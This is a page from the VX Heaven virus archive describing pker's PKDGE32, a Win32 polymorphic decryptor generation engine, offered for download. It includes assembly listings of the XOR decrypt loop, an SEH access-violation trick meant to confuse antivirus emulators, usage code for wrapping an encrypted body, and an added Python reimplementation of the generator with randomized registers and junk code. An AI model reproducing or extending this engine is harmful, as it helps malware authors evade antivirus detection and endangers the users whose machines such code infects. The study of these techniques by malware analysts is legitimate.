VX Heaven


pker's Decryptor Generation Engine for Win32

Author: pker

Author's notes

I originally set out to write a polymorphic engine. Part way through I got the idea of generating the decrypt code dynamically instead of morphing a fixed decrypt routine. The generated decryptor uses random registerz, has junk code inserted, and its instructionz can be permuted. While coding it I found that 'decryptor generation engine' describes it better than 'polymorphic engine', so I renamed it PKDGE32.

Generally, the decrypt code looks like the following:

                  mov     Rw,offset code2decrypt      ; Rw = pointer to the encrypted body
                  mov     Rz,decrypt_size             ; Rz = number of bytes to decrypt
decrypt_loop:     xor     byte [Rw],imm8              ; decrypt one byte with the 8-bit key
                  inc     Rw                          ; next byte
                  dec     Rz                          ; one less to go (sets ZF when it reaches 0)
                  jnz     decrypt_loop                ; loop until Rz == 0

Rw and Rz are written in the code above instead of fixed registerz like EAX or EBX: the engine picks a random register for each role when it generates the instructionz. The first two instructionz do not depend on each other, so the engine emits them in random order. Some instructionz can also be replaced by others with the same effect; for example MOV reg,imm32 can be replaced by PUSH imm32 / POP reg. Last but not least, the engine inserts junk codez after each instruction. The junk has to leave Rw, Rz and the stack alone, and junk placed between DEC Rz and JNZ must not modify the flags, otherwise the loop breaks.

One more thing: the engine sets up a SEH frame before the decrypt code, so that execution reaches the decryptor through an exception handler, in order to confuse some AV softz. There are junk codez between these instructionz too.

The SEH frame looks like the following:

start:            call    setup_seh                   ; push the address of the next instruction: that is the handler
                  mov     esp,[esp+8]                 ; handler entry: [esp+8] is our SEH record, move esp back to it
                  jmp     end_seh                     ; leave without returning to the exception dispatcher
setup_seh:        xor     Rx,Rx                       ; Rx = 0
                  push    dword [fs:Rx]               ; prev pointer; the handler pointer is the return address above it
                  mov     [fs:Rx],esp                 ; install the record at fs:[0]
                  dec     dword [Rx]                  ; write to address 0: access violation, control goes to the handler
                  jmp     start                       ; never reached on a real CPU; an emulator that does not fault loops here
end_seh:          xor     Ry,Ry                       ; Ry = 0
                  pop     dword [fs:Ry]               ; restore the previous handler
                  pop     Rz                          ; discard the return address pushed by the call

Then comes the real decrypt code (generated by this engine). Note that this only works where the handler is actually dispatched: in a 32-bit image linked with SafeSEH, a handler address that is not in the image's handler table is refused, and the access violation then kills the process instead of reaching the decryptor.

How to use it?

The engine source assembles with FASM, TASM, MASM, etc. As the examples below show, it takes EDI = buffer that receives the generated decryptor, ESI = pointer to the RNG seed, EBX = address of the code to decrypt, ECX = its size, and EDX = the key value (9Ah in the examples).

With FASM:

decryptor: times 40h      db      90h                 ; room for the generated decryptor (must fit the junk too)
crypt_code: ...                                       ; the encrypted body
crypted_size = $-crypt_code
rng_seed          dd          ?                       ; seed for the engine's RNG

gen_decryptor:    mov     edi,decryptor               ; where the decryptor goes
                  mov     esi,rng_seed                ; pointer to the seed
                  mov     ebx,crypt_code              ; code to decrypt
                  mov     ecx,crypted_size            ; its size
                  mov     edx,9ah                     ; key
                  call    __pkdge32

With TASM or MASM:

decryptor         db      40h dup (90h)               ; room for the generated decryptor (must fit the junk too)
crypt_code: ...                                       ; the encrypted body
crypted_size = $-crypt_code
rng_seed          dd          ?                       ; seed for the engine's RNG

gen_decryptor:    mov     edi,offset decryptor        ; where the decryptor goes
                  mov     esi,offset rng_seed         ; pointer to the seed
                  mov     ebx,offset crypt_code       ; code to decrypt
                  mov     ecx,crypted_size            ; its size
                  mov     edx,9ah                     ; key
                  call    __pkdge32

Note that rng_seed is declared uninitialized (dd ?) in both listings: store a fresh seed there before the call, otherwise every generated decryptor comes out the same.

One more feature: the engine returns in EAX the address of the code2decrypt field inside the generated decryptor (and leaves EDI pointing just past the decryptor), so we can patch that value after generating it. This means the code to be decrypted can be placed anywhere after generation, for instance directly after the decryptor, without padding the gap with lots of NOPz :P

We could code like this:

col_code: times crypted_size+200h    db   0           ; room for decryptor + junk + encrypted body

gen_decryptor:    mov     edi,col_code                ; decryptor goes at the start of the buffer
                  mov     esi,rng_seed                ; pointer to the seed
                  mov     ecx,crypted_size            ; size of the body
                  mov     ebx,12345678h               ; placeholder for code2decrypt, patched below
                  mov     edx,12345678h
                  call    __pkdge32                   ; EAX -> code2decrypt field, EDI -> end of decryptor
fix_address:      mov     [eax],edi                   ; the body will start right after the decryptor
copy_code:        mov     esi,crypt_code
                  mov     ecx,crypted_size
                  rep     movsb                       ; append the encrypted body
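To make the generation scheme concrete (random registerz, permuted setup instructionz, PUSH/POP substitution for MOV, flag-safe junk, and the returned offset of the code2decrypt field that the caller patches after generation, as in the listing above), here is an added Python model of the same idea. It is not pker's code and does not reproduce the engine's real output or RNG: the opcode encodings are standard IA-32, but the junk repertoire, the probabilities, the register exclusions and the tiny interpreter are my own choices, and the payload is a constructed sample. The interpreter only understands the handful of opcodes the generator emits and uses register values directly as offsets into a bytearray, which is enough to check that every generated decryptor actually decrypts the body.

```python
import random
import struct

EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI = range(8)
# Pointer register: not ESP (rm=100 needs a SIB byte), not EBP (mod=00, rm=101 means disp32).
PTR_REGS = [EAX, ECX, EDX, EBX, ESI, EDI]
CNT_REGS = [EAX, ECX, EDX, EBX, EBP, ESI, EDI]          # counter: anything but ESP


def load_imm32(reg, imm, rng):
    """mov reg,imm32 (B8+r id) or its substitute push imm32 / pop reg (68 id, 58+r).
    In both encodings the imm32 sits at offset 1, which gen_decryptor relies on."""
    if rng.random() < 0.5:
        return bytes([0xB8 + reg]) + struct.pack("<I", imm)
    return b"\x68" + struct.pack("<I", imm) + bytes([0x58 + reg])


def junk(rng, free):
    """0-2 junk instructions touching neither the live registers nor EFLAGS,
    so they are safe anywhere, including between dec Rz and jnz."""
    out = b""
    for _ in range(rng.randrange(3)):
        kind = rng.randrange(3)
        if kind == 0:
            out += b"\x90"                                                # nop
        elif kind == 1:
            out += bytes([0xB8 + rng.choice(free)]) + struct.pack("<I", rng.getrandbits(32))  # mov free,imm32
        else:
            r = rng.choice(free)
            out += bytes([0x50 + r, 0x58 + r])                            # push free / pop free
    return out


def gen_decryptor(seed, code2decrypt, size, key):
    """Return (decryptor_bytes, offset of the code2decrypt imm32 field)."""
    rng = random.Random(seed)
    rw = rng.choice(PTR_REGS)
    rz = rng.choice([r for r in CNT_REGS if r != rw])
    free = [r for r in range(8) if r not in (rw, rz, ESP)]
    setup = [(rw, code2decrypt), (rz, size)]
    rng.shuffle(setup)                                    # the two setup instructions are independent
    out, field = b"", None
    for reg, imm in setup:
        if reg == rw:
            field = len(out) + 1                          # imm32 follows the one-byte opcode
        out += load_imm32(reg, imm, rng) + junk(rng, free)
    loop = len(out)
    out += bytes([0x80, 0x30 | rw, key & 0xFF]) + junk(rng, free)   # xor byte [Rw],imm8
    out += bytes([0x40 + rw]) + junk(rng, free)                      # inc Rw
    out += bytes([0x48 + rz]) + junk(rng, free)                      # dec Rz
    rel = loop - (len(out) + 2)                                      # jnz rel8 back to the loop head
    assert rel >= -128
    out += bytes([0x75, rel & 0xFF])
    return out, field


def run(code, mem, base):
    """Interpret the generated bytes placed in `mem` at `base`. Only ZF is modelled."""
    regs, stack, ip, zf = [0] * 8, [], base, False
    end = base + len(code)
    while ip < end:
        op = mem[ip]
        if op == 0x90:
            ip += 1
        elif 0xB8 <= op <= 0xBF:
            regs[op - 0xB8] = struct.unpack_from("<I", mem, ip + 1)[0]; ip += 5
        elif op == 0x68:
            stack.append(struct.unpack_from("<I", mem, ip + 1)[0]); ip += 5
        elif 0x50 <= op <= 0x57:
            stack.append(regs[op - 0x50]); ip += 1
        elif 0x58 <= op <= 0x5F:
            regs[op - 0x58] = stack.pop(); ip += 1
        elif op == 0x80 and (mem[ip + 1] & 0xF8) == 0x30:
            addr = regs[mem[ip + 1] & 7]
            mem[addr] ^= mem[ip + 2]; zf = mem[addr] == 0; ip += 3
        elif 0x40 <= op <= 0x47:
            regs[op - 0x40] = (regs[op - 0x40] + 1) & 0xFFFFFFFF; zf = regs[op - 0x40] == 0; ip += 1
        elif 0x48 <= op <= 0x4F:
            regs[op - 0x48] = (regs[op - 0x48] - 1) & 0xFFFFFFFF; zf = regs[op - 0x48] == 0; ip += 1
        elif op == 0x75:
            rel = struct.unpack_from("<b", mem, ip + 1)[0]; ip += 2
            if not zf:
                ip += rel
        else:
            raise ValueError("unexpected opcode %#04x at %#x" % (op, ip))
    return regs


PLAIN = b"constructed sample payload, not real code"     # constructed for this example


def demo(seed, key=0x9A, base=0x100):
    """Generate with a placeholder code2decrypt, patch the field with the address right
    after the decryptor, append the encrypted body there, run it, and check the result."""
    dec, field = gen_decryptor(seed, 0x12345678, len(PLAIN), key)
    dec = bytearray(dec)
    struct.pack_into("<I", dec, field, base + len(dec))           # fix_address
    mem = bytearray(0x1000)
    mem[base:base + len(dec)] = dec
    body = base + len(dec)
    mem[body:body + len(PLAIN)] = bytes(b ^ key for b in PLAIN)   # encrypted body follows directly
    run(dec, mem, base)
    return bytes(dec), bytes(mem[body:body + len(PLAIN)]) == PLAIN


if __name__ == "__main__":
    for s in range(5):
        code, ok = demo(s)
        print(s, ok, code.hex())
```

Every seed yields a different byte sequence while the loop body stays the same five logical instructions; the constraints in junk() (never touch Rw, Rz, ESP or the flags) are what keep each variant correct.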

Well, enjoy it!


Download: pkdge32.zip (5956 bytes), PKDGE32, Jan 2005, MD5 sum 990206d05ecf6492a2d70fbcb5c73853
